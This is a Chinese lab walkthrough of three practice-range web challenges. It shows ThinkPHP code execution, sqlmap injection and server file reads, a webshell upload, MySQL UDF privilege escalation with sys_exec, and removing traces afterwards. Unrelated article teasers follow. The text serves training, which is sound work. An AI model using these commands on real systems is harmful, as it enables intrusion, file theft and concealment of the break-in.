【安鸾靶场】实战渗透

news2025/1/21 18:53:12

文章目录

  • 前言
  • 一、××租房网 (150分)
  • 二、企业网站 (300分)
  • 三、SQL注入进阶 (550分)


前言

最近看到安鸾的靶场有些比较有意思就打了一下午,有一定难度。

一、××租房网 (150分)

http://106.15.50.112:8031/
在这里插入图片描述
刚打开burp就报了thinkphp的代码执行
在这里插入图片描述

直接getshell
在这里插入图片描述
flag:
在这里插入图片描述

二、企业网站 (300分)

http://106.15.50.112:8035/
打开就看到闪灵cms
在这里插入图片描述
开启sqlmapapi:在这里插入图片描述
去用户界面测试:
在这里插入图片描述
这里注册一个验证码直接空就行:
这里有个注入点:

GET /?type=form&S_id=987181647 HTTP/1.1
Host: 106.15.50.112:8035
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Connection: close
Cache-Control: max-age=0

在这里插入图片描述
没跑出来:
在这里插入图片描述
寻找其他注入点:
在这里插入图片描述
那个api跑的慢直接上-r
在这里插入图片描述

在这里插入图片描述
这里有个flag
在这里插入图片描述
sqlmap -r .\test.txt -D scms -T SL_flag -C “flag,id” -dump
在这里插入图片描述

三、SQL注入进阶 (550分)

题目URL:http://106.15.50.112:8023/
提示:flag在服务器根目录

感觉像是sql注入后台上传
在这里插入图片描述
感觉像是伪静态:
在这里插入图片描述
在这里插入图片描述
尝试注入:加*
在这里插入图片描述

在这里插入图片描述
加-dbs参数爆库:
在这里插入图片描述
加–tables爆表:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
找一下后台:
在这里插入图片描述
在这里插入图片描述
这里有upload和images:都可以直接访问
在这里插入图片描述
寻找上传点:
在这里插入图片描述

制作图片马上传:
在这里插入图片描述
尝试修改扩展名:(失败)
在这里插入图片描述
限制了后缀
寻找其他点:
在这里插入图片描述
这里又来sql注入加上刚找的就3个注入点了
使用sqlmap获取一下shell
在这里插入图片描述
直接暴力跑路径:
在这里插入图片描述
失败(应该是不是默认的路径)
读取一下apache的配置找找路径:可能存在的路径
/etc/httpd/httpd.conf - 这是一种常见的位置,特别是在使用Red Hat或CentOS等发行版的系统中。
/etc/apache2/httpd.conf - 在使用Debian或Ubuntu等系统时,配置文件可能会位于此位置。
/usr/local/apache2/conf/httpd.conf - 如果安装apache通常会在/usr/local目录下找到它。
/etc/httpd/conf/httpd.conf - 在某些系统中也可以在此位置找到配置文件。

这里是这个路径直接读取:

sqlmap -r .\test.txt  --file-read="/etc/httpd/conf/httpd.conf"

在这里插入图片描述
在这里插入图片描述
直接–os-shell(目录权限不够)
在这里插入图片描述
用upload试试:(权限不够)在这里插入图片描述
试试其他的目录:

在这里插入图片描述
最后images有权限:
在这里插入图片描述

cat看不到,可能是权限问题:
在这里插入图片描述
在这里插入图片描述
可以通过sqlmap上传自己的shell:
sqlmap 会上传自己的马:
在这里插入图片描述

在这里插入图片描述
选择我们的马上传:
在这里插入图片描述
蚁剑上线:
在这里插入图片描述
这里查看flag发现权限不够:
在这里插入图片描述
这是mysql权限:
尝试suid失败,查看内核版本为5.15.0比较高gcc也没有,mysql的用户可以使用udf提权使用mysql的权限:
这里的密码为空:
在这里插入图片描述

查看可导出文件位置

show variables like '%secure%';
这个mysql>5.1版本

这的secure_file_priv为空可以提权
在这里插入图片描述

show variables like 'plugin%'

在这里插入图片描述
在kali中生成so文件上传到plugin目录
在这里插入图片描述

在这里插入图片描述

添加sys_exec和sys_eval函数

create function sys_exec returns string soname 'mysqludf3.so'
create function sys_eval returns string soname 'mysqludf3.so'

在这里插入图片描述

在这里插入图片描述

清除痕迹:
drop function sys_eval;
drop function sys_exec;
在这里插入图片描述
在这里插入图片描述
删除shell:
在这里插入图片描述
可以自己试试。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1063909.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

邮件注册(一)验证码发送

通过邮箱实现注册&#xff0c;用户请求验证码完成注册操作。 导入依赖&#xff1a; <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-mail</artifactId></dependency><dependency><g…

PACS系统 PACS系统源码一种用于存储、管理和传输医学影像数据的系统

医用软件中的影像归档与传输系统软件&#xff08;Picture Archiving and Communication System&#xff0c;简称PACS&#xff09;是一种用于存储、管理和传输医学影像数据的系统。其主要功能包括&#xff1a; 影像存储&#xff1a;PACS可以将医学影像数据以数字化的形式存储在服…

C语言之自定义类型_结构体篇(2)

目录 结构体传参 结构体实现位段&#xff08;位段的填充&可移植性&#xff09; 什么是位段 位段的大小计算 位段的内存分配 位段的跨平台问题 位段的应用 今天接着我们继续自定义类型结构体。&#x1f642;&#x1f642; 结构体传参 在我们初阶结构体我们学习过结…

Spring web security

儅使用spring的web security時&#xff0c;默認會轉向自帶的spring security example page。而不會轉向error page。 TODO: <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-security</artifactId> &l…

城市、机场、服务区等场景下的智慧公厕建设诀窍揭秘

在如今繁忙的生活节奏中&#xff0c;人们对于公共服务设施的需求越来越高。而智慧公厕正是把传统公共厕所转变为智慧化的场所&#xff0c;得到了极大的欢迎。目前&#xff0c;各行各业均对公共厕所进行信息化、智慧化、数字化的升级&#xff0c;尤其是在机场、服务区和城市等场…

基于SSM的电子相册系统设计与实现

末尾获取源码 开发语言&#xff1a;Java Java开发工具&#xff1a;JDK1.8 后端框架&#xff1a;SSM 前端&#xff1a;采用JSP技术开发 数据库&#xff1a;MySQL5.7和Navicat管理工具结合 服务器&#xff1a;Tomcat8.5 开发软件&#xff1a;IDEA / Eclipse 是否Maven项目&#x…

6.MySql连接SqlYog

MySql连接SqlYog SqlYog和navicat均是数据可视化工具&#xff0c;熟悉其一即可 SqlYog下载安装 连接&#xff0c;密码和端口号一定要正确&#xff01;&#xff01;&#xff01; 2.保存到数据库 创建数据库&表 创建数据库 创建成功 创建表 点击保存 查看表数据的…

基于javaweb的智慧社区设计与实现

目录 前言 一、技术栈 二、系统功能介绍 客户信息管理 客户信息管理 社区信息管理 车位租买支付 前台车位信息 车位预定提交 问卷调查管理 三、核心代码 1、登录模块 2、文件上传模块 3、代码封装 前言 随着信息技术在管理上越来越深入而广泛的应用&#xff0c;管理…

【Spring篇】Bean的三种配置和实例化方法

&#x1f38a;专栏【Spring】 &#x1f354;喜欢的诗句&#xff1a;天行健&#xff0c;君子以自强不息。 &#x1f386;音乐分享【如愿】 &#x1f384;欢迎并且感谢大家指出小吉的问题&#x1f970; 文章目录 &#x1f33a;bean基本配置&#x1f33a;bean别名配置&#x1f33a…

RStudion | 基础使用教程(初学者详细) | 基本设置 | 快捷操作 | 脚本运行 | 画图

RStudion | 基础使用教程 | 基本设置 | 快捷操作 | 脚本运行 | 画图 一、RStudio界面布局二、RStudio基础设置2.1 general | 常规设置2.2 Code | 代码2.3 Console | 控制台2.4 Appearance | 外观2.5 Pane Layout | 排版布局2.6 Packages | R包2.7 R Markdown2.8 Python2.9 Swea…

反爬虫机制与反爬虫技术(一)

反爬虫机制与反爬虫技术一 1、网络爬虫的法律与道德问题2、反爬虫机制与反爬虫技术2.1、User-Agent伪装2.2、代理IP2.3、请求频率控制2.4、动态页面处理2.5、验证码识别3、反爬虫案例:豆瓣电影Top250爬取3.1、爬取目标3.2、库(模块)简介3.3、翻页分析3.4、发送请求3.5、提取…

【Python+requests+unittest+excel】实现接口自动化测试框架

一、框架结构&#xff1a; 工程目录 二、Case文件设计 三、基础包 base3.1 封装get/post请求&#xff08;runmethon.py&#xff09; 1 import requests2 import json3 class RunMethod:4 def post_main(self,url,data,headerNone):5 res None6 if header …

Javascript文件上传

什么是文件上传 文件上传包含两部分&#xff0c; 一部分是选择文件&#xff0c;包含所有相关的界面交互。一部分是网络传输&#xff0c;通过一个网络请求&#xff0c;将文件的数据携带过去&#xff0c;传递到服务器中&#xff0c;剩下的&#xff0c;在服务器中如何存储&#xf…

TL-ER3220G端口映射设置

1、打开IE浏览器或其它浏览器&#xff0c;在地址栏输入192.168.1.1登录路由器的Web管理界面&#xff1b; 2、打开后弹出密码输入框&#xff0c;输入路由器的用户名和密码&#xff0c;出厂默认值为admin/admin&#xff0c;成功登录后将看到路由器的系统状态信息&#xff1b; 3、…

2023 年 Web 安全最详细学习路线指南,从入门到入职(含书籍、工具包)【建议收藏】

第一个方向&#xff1a;安全研发 你可以把网络安全理解成电商行业、教育行业等其他行业一样&#xff0c;每个行业都有自己的软件研发&#xff0c;网络安全作为一个行业也不例外&#xff0c;不同的是这个行业的研发就是开发与网络安全业务相关的软件。 既然如此&#xff0c;那其…

MyBatisPlus(十三)逻辑查询:and / or

说明 逻辑查询&#xff0c;对应SQL语句中的多个查询条件进行逻辑组合&#xff0c;包括 and 和 or。 逻辑 “与” &#xff1a;and 默认情况下&#xff0c;多个查询条件&#xff0c;就是使用的逻辑与&#xff08;and&#xff09;连接&#xff0c;并不需要再使用 and() 函数。…

modelize.ai - 小记

文章目录 关于 关于 官网&#xff1a;https://www.beta.modelize.ai Modelize.ai是一个AI agents和teams的创作平台&#xff0c;通过结合多元的agents以及工作流的衔接&#xff0c;让AI agents之间高效协同&#xff0c;达到一键式完成复杂工作的效果。 公司的愿景是让AI打工人…

从零开始学习线性回归:理论、实践与PyTorch实现

文章目录 &#x1f966;介绍&#x1f966;基本知识&#x1f966;代码实现&#x1f966;完整代码&#x1f966;总结 &#x1f966;介绍 线性回归是统计学和机器学习中最简单而强大的算法之一&#xff0c;用于建模和预测连续性数值输出与输入特征之间的关系。本博客将深入探讨线性…

Texifier 专业打造,让你的LaTeX编辑更高效!

作为LaTeX用户&#xff0c;你一定知道寻找一款优秀的编辑工具是多么重要。而Texifier&#xff08;原Texpad&#xff09;就是你在Mac上寻找的完美解决方案&#xff01;它是一款专业的LaTeX编辑工具&#xff0c;为你带来高效、便捷的编辑体验。 Texifier拥有丰富的功能&#xff…

Linux网络编程系列之UDP协议编程

一、什么是UDP协议 UPD协议&#xff08;User Datagram Protocol&#xff0c;用户数据报协议&#xff09;是Internet协议族中的一个无连接协议&#xff0c;属于传输层&#xff0c;它不保证数据传输的可靠性或完整性&#xff0c;只是把应用程序发给网络层的数据封装成数据包进行传…